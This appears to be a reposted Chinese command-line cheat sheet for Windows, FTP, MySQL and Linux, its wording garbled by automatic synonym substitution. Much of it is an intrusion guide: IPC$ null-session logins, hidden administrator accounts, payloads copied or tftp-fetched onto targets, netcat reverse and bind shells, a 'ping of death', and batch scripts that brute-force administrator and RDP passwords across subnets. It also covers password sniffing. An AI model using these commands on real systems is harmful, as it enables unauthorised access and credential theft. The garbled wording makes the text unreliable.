dos指令汇总ITeyemingxing - 娱乐之横扫全球

dos指令汇总ITeyemingxing

2019-02-02 11:44:16 | 作者: 凡灵 | 标签: 指令,文件,文件名 | 浏览: 8502

见到网络上,觉得值得学习,特此收藏到这儿,由于我简直天天来这个网站



net use \\ip\ipc$ " " /user:" " 树立IPC空链接
net use \\ip\ipc$ "暗码" /user:"用户名" 树立IPC非空链接
net use h: \\ip\c$ "暗码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删去IPC链接
net use h: /del 删去映射对方到本地的为H:的映射
net user 用户名 暗码 /add 树立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的特点
net localgroup administrators 用户名 /add 把"用户"添加到办理员中使其具有办理员权限,留意:administrator后加s用复数
net start 查看敞开了哪些效劳
net start 效劳名 敞开效劳;(如:net start telnet, net start schedule)
net stop 效劳名 中止某效劳
net time \\方针ip 查看对方时刻
net time \\方针ip /set 设置本地核算机时刻与"方针IP"主机的时刻同步,加上参数/yes可撤销承认信息
net view 查看本地局域网内敞开了哪些同享
net view \\ip 查看对方局域网内敞开了哪些同享
net config 显现体系网络设置
net logoff 断开衔接的同享
net pause 效劳名 暂停某效劳
net send ip "文本信息" 向对方发信息
net ver 局域网内正在运用的网络衔接类型和信息
net share 查看本地敞开的同享
net share ipc$ 敞开ipc$同享
net share ipc$ /del 删去ipc$同享
net share c$ /del 删去C:同享
net user guest 12345 用guest用户登陆后用将暗码改为12345
net password 暗码 更改体系登陆暗码
netstat -a 查看敞开了哪些端口,常用netstat -an
netstat -n 查看端口的网络衔接状况,常用netstat -an
netstat -v 查看正在进行的作业
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议运用状况(查看tcp/ip协议运用状况)
netstat -s 查看正在运用的一切协议运用状况
nbtstat -A ip 对方136到139其间一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-留意:参数-A要大写
tracert -参数 ip(或核算机名) 盯梢路由(数据包),参数:"-w数字"用于设置超时刻隔。
ping ip(或域名) 向对方主机发送默许巨细为32字节的数据,参数:"-l[空格]数据包巨细";"-n发送数据次数";"-t"指一向ping。
ping -t -l 65550 ip 逝世之ping(发送大于64K的文件并一向ping就成了逝世之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"显现悉数装备信息
tlist -t 以树队伍表显现进程(为体系的附加东西,默许是没有装置的,在装置目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制完毕某进程(为体系的附加东西,默许是没有装置的,在装置目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删去只读文件,/AR、/AH、/AS、/AA别离标明删去只读、躲藏、体系、存档文件,/A-R、/A-H、/A-S、/A-A标明删去除只读、躲藏、体系、存档以外的文件。例如"DEL/AR *.*"标明删去当时目录下一切只读文件,"DEL/A-S *.*"标明删去当时目录下除体系文件以外的一切文件

#2 二:

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删去目录及目录下的一切子目录和文件。一起运用参数/Q 可撤销删去操作时的体系承认就直接删去。(二个指令效果相同)
move 盘符\途径\要移动的文件名 寄存移动文件的途径\移动后文件名 移动文件,用参数/y将撤销承认移动目录存在相同文件的提示就直接掩盖
fc one.txt two.txt 3st.txt 比照二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向指令
at id号 敞开已注册的某个计划使命
at /delete 中止一切计划使命,用参数/yes则不需求承认就直接中止
at id号 /delete 中止某个已注册的计划使命
at 查看一切的计划使命
at \\ip time 程序名(或一个指令) /r 在某时刻运转对方某程序并从头发动核算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆效劳器,默许端口为23
open ip 衔接到IP(属telnet登陆后的指令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 途径\文件名1 途径\文件名2 /y 仿制文件1到指定的目录为文件2,用参数/y就一起撤销承认你要改写一份现存目录文件
copy c:\srv.exe \\ip\admin$ 仿制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格局文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 仿制对方admini$同享下的srv.exe文件(一切文件)至本地C:
xcopy 要仿制的文件或目录树 方针地址\目录名 仿制文件和目录树,用参数/Y将不提示掩盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将"IP"的server.exe下载到方针主机c:\server.exe 参数:-i指以二进制方法传送,如传送exe文件时用,如不加-i 则以ASCII方法(传送文本文件方法)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至效劳器或进行文件操作,默许端口为21。bin指用二进制方法传送(可履行文件进);默许为ASCII格局传送(文本文件时)
route print 显现出IP路由,将首要显现网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是姓名解析的意思,担任把一个IP解析成一个物理性的MAC地址。arp -a将显现出悉数信息
start 程序名或指令 /max 或/min 新开一个新窗口并最大化(最小化)运转某程序或指令
mem 查看cpu运用状况
attrib 文件名(目录名) 查看某文件(目录)的特点
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,体系,躲藏 特点;用+则是添加为某特点
dir 查看文件,参数:/Q显现文件及目录属体系哪个用户,/T:C显现文件创立时刻,/T:A显现文件前次被拜访时刻,/T:W前次被修正时刻
date /t 、 time /t 运用此参数即"DATE/T"、"TIME/T"将只显现当时日期和时刻,而不必输入新日期和时刻
set 指定环境变量称号=要指派给变量的字符 设置环境变量
set 显现当时一切的环境变量
set p(或其它字符) 显现出当时以字符p(或其它字符)最初的一切环境变量
pause 暂停批处理程序,并显现出:请按任意键持续....
if 在批处理程序中履行条件处理(更多阐明见if指令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签有必要独自一行,且以冒号打头,例如:":start"标签)
call 途径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多阐明见call /?)
for 对一组文件中的每一个文件履行某个特定指令(更多阐明见for指令及变量)
echo on或off 翻开或封闭echo,仅用echo不加参数则显现当时echo设置
echo 信息 在屏幕上显现出信息
echo 信息 pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻觅字符串hello
find 文件名 查找某文件
title 标题姓名 更改CMD窗口标题姓名
color 色彩值 设置cmd操控台远景和布景色彩;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=嫩绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 称号 更改cmd.exe的显现的指令提示符(把C:\、D:\一致改为:EntSky\ )

#3 三:

ver 在DOS窗口下显现版别信息
winver 弹出一个窗口显现版别信息(内存巨细、体系版别、补丁版别、核算机名)
format 盘符 /FS:类型 格局化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创立目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显现出目录,用参数-f 将列出第个文件夹中文件称号
type 文件名 显现文本文件的内容
more 文件名 逐屏显现输出文件
doskey 要确定的指令=字符
doskey 要解锁指令= 为DOS供给的确定指令(修正指令行,从头调用win2k指令,并创立宏)。如:确定dir指令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出使命办理器
chkdsk /F D: 查看磁盘D并显现状况陈述;加参数/f并修正磁盘上的过错
tlntadmn telnt效劳admn,键入tlntadmn挑选3,再挑选8,就能够更改telnet效劳默许端口23为其它任何端口
exit 退出cmd.exe程序或现在,用参数/B则是退出当时批处理脚本而不是cmd.exe
path 途径\可履行文件的文件名 为可履行文件设置一个途径。
cmd 发动一个win2K指令解说窗口。参数:/eff、/en 封闭、敞开指令扩展;更我具体阐明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静方法导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显现或修正文件拜访操控列表(ACL)——针对NTFS格局时。参数:/D 用户名:设定回绝某用户拜访;/P 用户名:perm 替换指定用户的拜访权限;/G 用户名:perm 赋予指定用户拜访权限;Perm 可所以: N 无,R 读取, W 写入, C 更改(写入),F 彻底操控;例:cacls D:\test.txt /D pub 设定d:\test.txt回绝pub用户拜访。
cacls 文件名 查看文件的拜访用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络装备状况

#4 四:

IIS效劳指令:
iisreset /reboot 重启win2k核算机(但有提示体系将重启信息呈现)
iisreset /start或stop 发动(中止)一切Internet效劳
iisreset /restart 中止然后从头发动一切Internet效劳
iisreset /status 显现一切Internet效劳状况
iisreset /enable或disable 在本地体系上启用(禁用)Internet效劳的从头发动
iisreset /rebootonerror 当发动、中止或从头发动Internet效劳时,若发作过错将从头开机
iisreset /noforce 若无法中止Internet效劳,将不会强制中止Internet效劳
iisreset /timeout Val在抵达逾时刻(秒)时,仍未中止Internet效劳,若指定/rebootonerror参数,则电脑将会从头开机。预设值为从头发动20秒,中止60秒,从头开机0秒。
FTP 指令: (后边有具体阐明内容)
ftp的指令行格局为:
ftp -v -d -i -n -g[主机名] -v 显现长途效劳器的一切呼应信息。
-d 运用调试方法。
-n 约束ftp的主动登录,即不运用.netrc文件。
-g 撤销大局文件名。
help [指令] 或 ?[指令] 查看指令阐明
bye 或 quit 中止主机FTP进程,并退出FTP办理方法.
pwd 列出当时远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [长途主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接纳一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当时远端主机目录中的文件.假如有本地文件,就将成果写至本地文件
ascii 设定以ASCII方法传送文件(缺省值)
bin 或 image 设定以二进制方法传送文件
bell 每完结一次文件传送,报警提示
cdup 回来上一级目录
close 中止与长途效劳器的ftp会话(与open对应)
open host[port] 树立指定ftp效劳器衔接,可指定衔接端口
delete 删去远端主机中的文件
mdelete [remote-files] 删去一批文件
mkdir directory-name 在远端主机中树立目录
rename [from] [to] 改动远端主机中的文件名
rmdir directory-name 删去远端主机中的目录
status 显现当时FTP的状况
system 显现远端主机体系类型
user user-name [password] [account] 从头以其他用户名登录远端主机
open host [port] 从头树立一个新的衔接
prompt 交互提示方法
macdef 界说宏指令
lcd 改动当时本地主机的作业目录,假如缺省,就转到当时用户的HOME目录
chmod 改动远端主机的文件权限
case 当为ON时,用MGET指令仿制的文件名到本地机器中,悉数转化为小写字母
cd remote-dir 进入长途主机目录
cdup 进入长途主机目录的父目录
! 在本地机中履行交互shell,exit回到ftp环境,如!ls*.zip

#5 五:

MYSQL 指令:
mysql -h主机地址 -u用户名 -p暗码 衔接MYSQL;假如刚装置好MYSQL,超级用户root是没有暗码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root能够不必加空格,其它也相同)
exit 退出MYSQL
mysqladmin -u用户名 -p旧暗码 password 新暗码 修正暗码
grant select on 数据库.* to 用户名@登录主机 identified by \"暗码\"; 添加新用户。(留意:和上面不同,下面的由所以MYSQL环境中的指令,所以后边都带一个分号作为指令完毕符)
show databases; 显现数据库列表。刚开端时才两个数据库:mysql和test。mysql库很重要它里边有MYSQL的体系信息,咱们改暗码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显现库中的数据表
describe 表名; 显现数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记载清空
select * from 表名; 显现表中的记载
mysqldump opt school school.bbb 备份数据库:(指令在DOS的\\mysql\\bin目录下履行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,翻开看看你会有新发现。
win2003体系下新增指令(有用部份):
shutdown /参数 封闭或重启本地或长途主机。
参数阐明:/S 封闭主机,/R 重启主机, /T 数字 设定延时的时刻,规模0~180秒之间, /A撤销开机,/M //IP 指定的长途主机。
例:shutdown /r /t 0 当即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 中止一个或多个使命和进程。
参数阐明:/PID 要中止进程的pid,可用tasklist指令取得各进程的pid,/IM 要中止的进程的进程名,/F 强制中止进程,/T 中止指定的进程及他所发动的子进程。
tasklist 显现当时运转在本地和长途主机上的进程、效劳、效劳各进程的进程标识符(PID)。
参数阐明:/M 列出当时进程加载的dll文件,/SVC 显现出每个进程对应的效劳,无参数时就只列出当时的进程。

#6 六:

Linux体系下根本指令: 要差异巨细写
uname 显现版别信息(同win2K的 ver)
dir 显现当时目录文件,ls -al 显现包含躲藏文件(同win2K的 dir)
pwd 查询当时地址的目录方位
cd cd ..回到上一层目录,留意cd 与..之间有空格。cd /回来到根目录。
cat 文件名 查看文件内容
cat abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方法显现一个文本文件。
cp 仿制文件
mv 移动文件
rm 文件名 删去文件,rm -a 目录名删去目录及子目录
mkdir 目录名 树立目录
rmdir 删去子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜索
date 现在的日期、时刻
who 查询现在和你运用同一台机器的人以及Login时刻地址
w 查询现在上机者的具体资料
whoami 查看自己的帐号称号
groups 查看或人的Group
passwd 更改暗码
history 查看自己下过的指令
ps 显现进程状况
kill 中止某进程
gcc 黑客一般用它来编译C言语写的文件
su 权限转化为指定运用者
telnet IP telnet衔接对方主机(同win2K),当呈现bash$时就阐明衔接成功。
ftp ftp衔接上某效劳器(同win2K)

附:批处理指令与变量

1:for指令及变量 根本格局:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是差异巨细写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其间%0默许给批处理文件名运用,%1默许为运用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件,可运用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一个"1"指开端值,第二个"1"指增长量,第三个"254"指完毕值,即:从1到254;"(1 -1 254)"阐明:即从254到1 }

command:指定对第个文件履行的指令,如:net use指令;如要履行多个指令时,指令这间加: 来离隔
command_parameters:为特定指令指定参数或指令行开关

IN (set):指在(set)中取值;DO command :指履行command

参数:/L 指用增量方法{ (set)为增量方法时 };/F 指从文件中不断取值,直到取完中止{ (set)为文件时,如(d:\pass.txt)时 }。
用法举例:
@echo off
echo 用法格局:test.bat *.*.* test.txt

for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G /user:administrator | find "指令成功完结" test.txt
存为test.bat 阐明:对指定的一个C类网段的254个IP顺次试树立administrator暗码为空的IPC$衔接,假如成功就把该IP存在test.txt中。

/L指用增量方法(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默许的 %1;%%G 为变量(ip的最终一位); 用来离隔echo 和net use 这二个指令;| 指树立了ipc$后,在成果顶用find查看是否有"指令成功完结"信息;%1.%%G 为完好的IP地址;(1 1 254) 指开端值,增长量,结止值。
@echo off
echo 用法格局:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 阐明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户暗码,直到文件中值取完中止。%%i为用户名;%1为输入的IP地址(默许)。

#7 七:

2:if指令及变量 根本格局:
IF [not] errorlevel 数字 指令句子 假如程序运转最终回来一个等于或大于指定数字的退出编码,指定条件为"真"。
例:IF errorlevel 0 指令 指程序履行后回来的值为0时,就值行后边的指令;IF not errorlevel 1 指令指程序履行最终回来的值不等于1,就履行后边的指令。
0 指发现并成功履行(真);1 指没有发现、没履行(假)。
IF [not] 字符串1字符串2 指令句子 假如指定的文本字符串匹配(即:字符串1 等于 字符串2),就履行后边的指令。
例:"if "%2%""4" goto start"指:假如输入的第二个变量为4时,履行后边的指令(留意:调用变量时就%变量名%并加" ")
IF [not] exist 文件名 指令句子 假如指定的文件名存在,就履行后边的指令。
例:"if not nc.exe goto end"指:假如没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 指令句子 else 指令句子或 IF [not] 字符串1字符串2 指令句子 else 指令句子或 IF [not] exist 文件名 指令句子 else 指令句子 加上:else 指令句子后指:当时面的条件不成立时,就指行else后边的指令。留意:else 有必要与 if 在同一行才有用。 当有del指令时需把del指令悉数内容用 括起来,由于del指令要独自一行时才干履行,用上 后就等所以独自一行了;例如:"if exist test.txt. else echo test.txt.missing ",留意指令中的"."


(二)体系外部指令(均需下载相关东西):

1、瑞士军刀:nc.exe

参数阐明:
-h 查看协助信息
-d 后台方法
-e prog程序重定向,一但衔接就履行[风险]
-i secs延时的距离
-l 监听方法,用于入站衔接
-L 监听方法,衔接天闭后依然持续监听,直到CTR+C
-n IP地址,不能用域名
-o film记载16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及长途端口
-t 运用Telnet交互方法
-u UDP方法
-v 具体输出,用-vv将更具体
-w数字 timeout延时刻隔
-z 将输入,输出关掉(用于扫锚时)
根本用法:
nc -nvv 192.168.0.1 80 衔接到192.168.0.1主机的80端口
nc -l -p 80 敞开本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向衔接192.168.0.2的5354端口
高档用法:
nc -L -p 80 作为蜜罐用1:敞开并不停地监听80端口,直到CTR+C中止
nc -L -p 80 c:\log.txt 作为蜜罐用2:敞开并不停地监听80端口,直到CTR+C,一起把成果输出到c:\log.txt
nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:敞开并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件效果
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:敞开并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件效果
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向衔接打破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 要传送的文件途径及称号
在对方主机上用:nc -vv 本机IP 本机端口 寄存文件的途径及称号 传送文件到对方主机
备 注:
| 管道指令
或 重定向指令。" ",例如:tlntadmn test.txt 指把test.txt的内容赋值给tlntadmn指令
@ 标明履行@后边的指令,但不会显现出来(后台履行);例:@dir c:\winnt d:\log.txt 意思是:后台履行dir,并把成果存在d:\log.txt中
与 的差异 " "指:掩盖;" "指:保存到(添加到)。
如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个指令别离履行二次比较看:用 的则是把二次的成果都保存了,而用: 则只要一次的成果,是由于第2次的成果把第一次的掩盖了。

#8 八:

2、扫锚东西:xscan.exe

根本格局
xscan -host 开端IP [- 中止IP ] 检测项目 [其他选项] 扫锚"开端IP到中止IP"段的一切主机信息
xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件名"中的一切主机信息
检测项目
-active 检测主机是否存活
-os 检测长途操作体系类型(经过NETBIOS和SNMP协议)
-port 检测常用效劳的端口状况
-ftp 检测FTP弱口令
-pub 检测FTP效劳匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server缝隙
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码缝隙
-cgi 检测CGI缝隙
-nasl 加载Nessus进犯脚本
-all 检测以上一切项目
其它选项
-i 适配器编号 设置网络适配器, 适配器编号 可经过"-l"参数获取
-l 显现一切网络适配器
-v 显现具体扫描进展
-p 越过没有呼应的主机
-o 越过没有检测到敞开端口的主机
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默许数量为100,10
-log 文件名 指定扫描陈述文件名 (后缀为:TXT或HTML格局的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的一切缝隙,越过无呼应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的规范端口状况,NT弱口令用户,最大并发线程数量为150,越过没有检测到敞开端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的一切主机的规范端口状况,CGI缝隙,最大并发线程数量为200,同一时刻最多检测5台主机,显现具体检测进展,越过没有检测到敞开端口的主机

#9 九:

3、指令行方法嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议暗码
参数阐明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤暗码信息
-hide 后台运转
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII方法输出
-hex 以16进制方法输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运转嗅探暗码并将暗码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格局输出

4、终端效劳暗码破解: tscrack.exe

参数阐明
-h 显现运用协助
-v 显现版别信息
-s 在屏幕上打出解密才能
-b 暗码过错时宣布的声响
-t 同是宣布多个衔接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 运用-f后边的暗码
-F 距离时刻(频率)
-l 运用-l后边的用户名
-w 运用-w后边的暗码字典
-p 运用-p后边的暗码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 长途用暗码字典文件暴破主机的administrator的登陆暗码
tscrack 192.168.0.1 -l administrator -p 123456 用暗码123456长途登陆192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) (假定现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运转hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运转3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就能够等候成果了)
hack.bat意思是:运转tscrack.exe用字典暴破3389.txt中一切主机的administrator暗码,并将破解成果保存在rouji.txt文件中。

5、其它:

Shutdown.exe
Shutdown \\IP地址 t:20 20秒后将对方NT主动封闭(Windows 2003体系自带东西,在Windows2000下用进就得下载此东西才干用。在前面Windows 2003 DOS指令中有具体介绍。)
fpipe.exe (TCP端口重定向东西) 在第二篇中有具体阐明(端口重定向绕过防火墙)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的成果会彻底是www.sina.com.cn的主机信息
Fpipe -l 23 -s 88 -r 23 方针IP 把本机向方针IP发送的23端口Telnet恳求经端口重定向后,就经过88端口发送到方针IP的23端口。(与方针IP树立Telnet时本机就用的88端口与其相衔接)然后:直接Telnet 127.0.0.1(本机IP)就衔接到方针IP的23端口了。
OpenTelnet.exe (长途敞开telnet东西)
opentelnet.exe \\IP 帐号 暗码 ntlm认证方法 Telnet端口 (不需求上传ntlm.exe损坏微软的身份验证方法)直接长途敞开对方的telnet效劳后,就可用telnet \\ip 衔接上对方。
NTLM认证方法:0:不运用NTLM身份验证;1:先测验NTLM身份验证,假如失利,再运用用户名和暗码;2:只运用NTLM身份验证。

ResumeTelnet.exe (OpenTelnet顺便的另一个东西)
resumetelnet.exe \\IP 帐号 暗码 用Telnet衔接完对方后,就用这个指令将对方的Telnet设置复原,并一起封闭Telnet效劳。

#10 十:

6、FTP指令详解:

FTP指令是Internet用户运用最频频的指令之一,了解并灵敏运用FTP的内部指令,能够大大便利运用者,并收到事半功倍之效。假如你想学习运用进行后台FTP下载,那么就有必要学习FTP指令。

FTP的指令行格局为:
ftp -v -d -i -n -g [主机名] ,其间

-v 显现长途效劳器的一切呼应信息;

-n 约束ftp的主动登录,即不运用;.n etrc文件;

-d 运用调试方法;

-g 撤销大局文件名。

FTP运用的内部指令如下(中括号标明可选项):

1.![cmd[args]]:在本地机中履行交互shell,exit回到ftp环境,如:!ls*.zip
2.$ macro-ame[args]: 履行宏界说macro-name。

3.account[password]: 供给登录长途体系成功后拜访体系资源所需的弥补口令。
4.append local-file[remote-file]:将本地文件追加到长途体系主机,若未指定长途体系文件名,则运用本地文件名。

5.ascii:运用ascii类型传输方法。
6.bell:每个指令履行完毕后核算机响铃一次。

7.bin:运用二进制文件传输方法。
8.bye:退出ftp会话进程。

9.case:在运用mget时,将长途主机文件名中的大写转为小写字母。
10.cd remote-dir:进入长途主机目录。

11.cdup:进入长途主机目录的父目录。
12.chmod mode file-name:将长途主机文件file-name的存取方法设置为mode,如:chmod 777 a.out。

13.close:中止与长途效劳器的ftp会话(与open对应)。
14.cr:运用asscii方法传输文件时,将回车换行转化为回行。

15.delete remote-file:删去长途主机文件。
16.debug[debug-value]:设置调试方法, 显现发送至长途主机的每条指令,如:deb up 3,若设为0,标明撤销debug。

17.dir[remote-dir][local-file]:显现长途主机目录,并将成果存入本地文件。
18.disconnection:同close。

19.form format:将文件传输方法设置为format,缺省为file方法。
20.get remote-file[local-file]: 将长途主机的文件remote-file传至本地硬盘的local-file。

21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同指令行的-g参数。
22.hash:每传输1024字节,显现一个hash符号(#)。

23.help[cmd]:显现ftp内部指令cmd的协助信息,如:help get。
24.idle[seconds]:将长途效劳器的休眠计时器设为[seconds]秒。

25.image:设置二进制传输方法(同binary)。
26.lcd[dir]:将本地作业目录切换至dir。

27.ls[remote-dir][local-file]:显现长途目录remote-dir, 并存入本地文件local-file。
28.macdef macro-name:界说一个宏,遇到macdef下的空行时,宏界说完毕。

29.mdelete[remote-file]:删去长途主机文件。
30.mdir remote-files local-file:与dir相似,但可指定多个长途文件,如 :mdir *.o.*.zipoutfile 。

31.mget remote-files:传输多个长途文件。
32.mkdir dir-name:在长途主机中建一目录。

33.mls remote-file local-file:同nlist,但可指定多个文件名。
34.mode[modename]:将文件传输方法设置为modename, 缺省为stream方法。

35.modtime file-name:显现长途主机文件的最终修正时刻。
36.mput local-file:将多个文件传输至长途主机。

37.newer file-name: 假如长途机中file-name的修正时刻比本地硬盘同名文件的时刻更近,则重传该文件。
38.nlist[remote-dir][local-file]:显现长途主机目录的文件清单,并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符彼此转化, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该指令特别适用于长途主机为非UNIX机的状况。
40.ntrans[inchars[outchars]]:设置文件姓名符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。

41.open host[port]:树立指定ftp效劳器衔接,可指定衔接端口。
42.passive:进入被迫传输方法。

43.prompt:设置多个文件传输时的交互提示。
44.proxy ftp-cmd:在非有必要操控衔接中,履行一条ftp指令, 该指令答应衔接两个ftp效劳器,以在两个效劳器间传输文件。第一条ftp指令有必要为open,以首要树立两个效劳器间的衔接。
45.put local-file[remote-file]:将本地文件local-file传送至长途主机。
46.pwd:显现长途主机的当时作业目录。

47.quit:同bye,退出ftp会话。
48.quote arg1,arg2...:将参数逐字发至长途ftp效劳器,如:quote syst.

49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:相似于get, 但若local-file存在,则从前次传输中止处续传。

51.rhelp[cmd-name]:恳求取得长途主机的协助。
52.rstatus[file-name]:若未指定文件名,则显现长途主机的状况, 不然显现文件状况。

53.rename[from][to]:更改长途主机文件名。
54.reset:铲除答复行列。

55.restart marker:从指定的标志marker处,从头开端get或put,如:restart 130。
56.rmdir dir-name:删去长途主机目录。

57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。
58.send local-file[remote-file]:同put。

59.sendport:设置PORT指令的运用。
60.site arg1,arg2...:将参数作为SITE指令逐字发送至长途ftp主机。

61.size file-name:显现长途主机文件巨细,如:site idle 7200。
62.status:显现当时ftp状况。

63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时运用stream结构。
64.sunique:将长途主机文件名存储设置为只一(与runique对应)。

65.system:显现长途主机的操作体系类型。
66.tenex:将文件传输类型设置为TENEX机的所需的类型。

67.tick:设置传输时的字节计数器。
68.trace:设置包盯梢。

69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方法。
70.umask[newmask]:将长途效劳器的缺省umask设置为newmask,如:umask 3

71.user user-name[password][account]:向长途主机标明自己的身份,需求口令时,有必要输入口令,如:user anonymous my@email。
72.verbose:同指令行的-v参数,即设置翔实陈述方法,ftp 效劳器的一切响 应都将显现给用户,缺省为on.

73.?[cmd]:同help.

#11 十一:

7:核算机运转指令全集 winver-查看Windows版别
wmimgmt.msc翻开windows办理体系结构
